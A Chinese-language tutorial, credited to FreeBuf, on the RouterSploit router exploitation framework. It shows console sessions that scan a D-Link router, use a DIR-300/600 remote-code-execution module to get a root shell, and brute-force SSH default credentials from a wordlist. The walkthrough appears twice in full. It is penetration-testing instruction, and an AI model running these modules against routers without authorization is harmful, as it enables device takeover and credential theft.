RouterSploit 路由器漏洞检测及利用框架 项目简介
RouteSploit框架是一款开源的漏洞检测及利用框架,其针对的对象主要为路由器等嵌入式设备。框架功能RouteSploit框架主要由可用于渗透测试的多个功能模块组件组成,1、 Scanners:模块功能主要为检查目标设备是否存在可利用的安全漏洞;2、Creds:模块功能主要针对网络服务的登录认证口令进行检测;3、Exploits:模块功能主要为识别到目标设备安全漏洞之后,对漏洞进行利用,实现提权等目的。工具安装sudo apt-get install python-requests python-paramiko python-netsnmpgit clone ./rsf.pyGitHub地址如上命令中所述为:RouteSploit。操作使用首先,启动RouteSploit框架,具体如下所示root@kalidev:~/git/routersploit# ./
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
| // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
| |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_
\_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__|
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Router Exploitation Framework |_|
Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
Codename : Wildest Dreams version : 1.0.0
rsf >1、Scanners 模块scanners模块,具备设备漏洞扫描功能,通过该模块,可快速识别目标设备是否存在可利用的安全漏洞,下面会以一个dlink路由器为例,结合进行操作描述。(1)选择scanners模块,操作如下,rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options(2)显示选项Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g.
port 80 Target port(3)设置目标设备IPrsf (D-Link Scanner) > set target
[+] {'target': ''}(4)运行模块,执行情况如下,rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable
[+] Device is vulnerable!
- exploits/dlink/dwr_932_info_disclosure如上所呈现的结果,目标设备存在dwr_932_info_disclosure漏洞。接下来,我们选择合适的payload进行传递和测试(以下涉及exploits模块功能操作,如需,请再往下查阅),2、Exploits 模块(1)选择Exploits模块,操作如下,rsf > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >我们也可以使用“tab”键来自动补充输入命令。(2)显示选项rsf (D-LINK DIR-300 & DIR-600 RCE) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g.
port 80 Target Port设置选项,操作如下,rsf (D-LINK DIR-300 & DIR-600 RCE) > set target
[+] {'target': ''}(3)运行模块通过使用“run”或“exploit”命令来完成漏洞的利用,rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root也可检测目标设备是否存在选定的安全漏洞,操作如下,rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable(4)显示具体漏洞信息通过“show info”命令,显示漏洞信息,包括其存在的设备品牌、型号、漏洞类型及参考来源,具体参考如下,rsf (D-LINK DIR-300 & DIR-600 RCE) > show info
D-LINK DIR-300 & DIR-600 RCE
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.
- D-Link DIR 300
- D-Link DIR 600
- Michael Messner <devnull[at]> # vulnerability discovery
- Marcin Bury <marcin.bury[at]> # routersploit module
-、 Creds模块(1)选择模块此模块相关文件位于 /routesploit/modules/creds/ 目录下,以下为该模块支持检测的服务,? ftp ? ssh? telnet? http basic auth? http form auth? snmp在检测过程中,可通过两个层面对上述的每个服务进行检测,默认服务登录口令检测:利用框架提供的各类路由等设备以及服务的默认登录口令字典,通过快速列举的方式,可在较短时间内(几秒钟)验证设备是否仍使用默认登录口令;暴力破解:利用框架中所提供的特定账户或者账户列表进行字典攻击。其中包含两个参数(登录账户及密码),如框架/routesploit/wordlists目录中字典所示,参数值可以为一个单词(如’admin’),或者是一整个单词列表。(2)控制台rsf > use creds/
creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default
creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce
rsf > use creds/ssh_default
rsf (SSH Default Creds) >(3)显示选项(4)设置目标设备IPrsf (SSH Default Creds) > set target
[+] {'target': ''}(5)运行模块rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'
Elapsed time: 38.9181981087 seconds
[+] Credentials found!
Login Password
----- --------
admin 1234
rsf (SSH Default Creds) >介绍内容来自 FreeBuf黑客与极客
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
| // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
| |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_
\_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__|
| |
Router Exploitation Framework |_|
Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
Codename : Wildest Dreams version : 1.0.0
rsf >1、Scanners 模块scanners模块,具备设备漏洞扫描功能,通过该模块,可快速识别目标设备是否存在可利用的安全漏洞,下面会以一个dlink路由器为例,结合进行操作描述。(1)选择scanners模块,操作如下,rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options(2)显示选项Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g.
port 80 Target port(3)设置目标设备IPrsf (D-Link Scanner) > set target
[+] {'target': ''}(4)运行模块,执行情况如下,rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable
[+] Device is vulnerable!
- exploits/dlink/dwr_932_info_disclosure如上所呈现的结果,目标设备存在dwr_932_info_disclosure漏洞。接下来,我们选择合适的payload进行传递和测试(以下涉及exploits模块功能操作,如需,请再往下查阅),2、Exploits 模块(1)选择Exploits模块,操作如下,rsf > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >我们也可以使用“tab”键来自动补充输入命令。(2)显示选项rsf (D-LINK DIR-300 & DIR-600 RCE) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g.
port 80 Target Port设置选项,操作如下,rsf (D-LINK DIR-300 & DIR-600 RCE) > set target
[+] {'target': ''}(3)运行模块通过使用“run”或“exploit”命令来完成漏洞的利用,rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root也可检测目标设备是否存在选定的安全漏洞,操作如下,rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable(4)显示具体漏洞信息通过“show info”命令,显示漏洞信息,包括其存在的设备品牌、型号、漏洞类型及参考来源,具体参考如下,rsf (D-LINK DIR-300 & DIR-600 RCE) > show info
D-LINK DIR-300 & DIR-600 RCE
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.
- D-Link DIR 300
- D-Link DIR 600
- Michael Messner <devnull[at]> # vulnerability discovery
- Marcin Bury <marcin.bury[at]> # routersploit module
-、 Creds模块(1)选择模块此模块相关文件位于 /routesploit/modules/creds/ 目录下,以下为该模块支持检测的服务,? ftp ? ssh? telnet? http basic auth? http form auth? snmp在检测过程中,可通过两个层面对上述的每个服务进行检测,默认服务登录口令检测:利用框架提供的各类路由等设备以及服务的默认登录口令字典,通过快速列举的方式,可在较短时间内(几秒钟)验证设备是否仍使用默认登录口令;暴力破解:利用框架中所提供的特定账户或者账户列表进行字典攻击。其中包含两个参数(登录账户及密码),如框架/routesploit/wordlists目录中字典所示,参数值可以为一个单词(如’admin’),或者是一整个单词列表。(2)控制台rsf > use creds/
creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default
creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce
rsf > use creds/ssh_default
rsf (SSH Default Creds) >(3)显示选项(4)设置目标设备IPrsf (SSH Default Creds) > set target
[+] {'target': ''}(5)运行模块rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'
Elapsed time: 38.9181981087 seconds
[+] Credentials found!
Login Password
----- --------
admin 1234
rsf (SSH Default Creds) >介绍内容来自 FreeBuf黑客与极客